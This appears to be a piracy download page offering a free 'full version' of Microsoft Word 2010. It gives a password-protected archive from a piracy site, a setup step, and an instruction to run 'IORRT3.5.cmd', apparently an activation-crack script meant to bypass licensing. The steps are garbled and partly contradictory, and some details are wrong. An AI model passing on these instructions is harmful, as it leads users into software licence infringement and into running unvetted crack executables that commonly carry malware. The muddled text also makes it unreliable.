This article explains how to get the full version Microsoft Word 2010 free of charge on your computer. Follow the direct download link and instructions below for guidance on installing Microsoft Word 2010 on your computer.
Table of contents
- About the software
- Microsoft Word 2010 System Prerequisites
- How to download and install Microsoft Word 2010.
- Required files
About the software
Microsoft Word 2010 was included in Office 2010 as an essential program. Word 2010 allows more customization of the Ribbon, adds a Backstage view for file management, has improved document navigation, allows creation and embedding of screenshots, and integrates with Word Web App.
Microsoft Word 2010 System Requirements
Office 2010’s minimum system requirements are: Intel Pentium III processor (500 MHz); 256 MB SDRAM PC100 SDRAM; Windows XP Professional 3 with Service Pack 3. Office 2003 had a processor of 233 Mhz and 128 Mb RAM.
Downloading and installing Microsoft Word 2010
- Once you have finished downloading the files required, click the download button. Depending upon your download speed, it might take anywhere from a few seconds to a couple of hours.
- Extract the downloaded files. This article will show you how to extract. The password to extract will always be: www.mysoftwarefree.com
- Run setup.exe, and then install Microsoft Word 2010.
- Now, you can install the complete version of Microsoft Word 2010 without any restrictions on your computer.
- To install, first download this file. Next, open « IORRT3.5.cmd » by clicking the link. Then try launching the software again.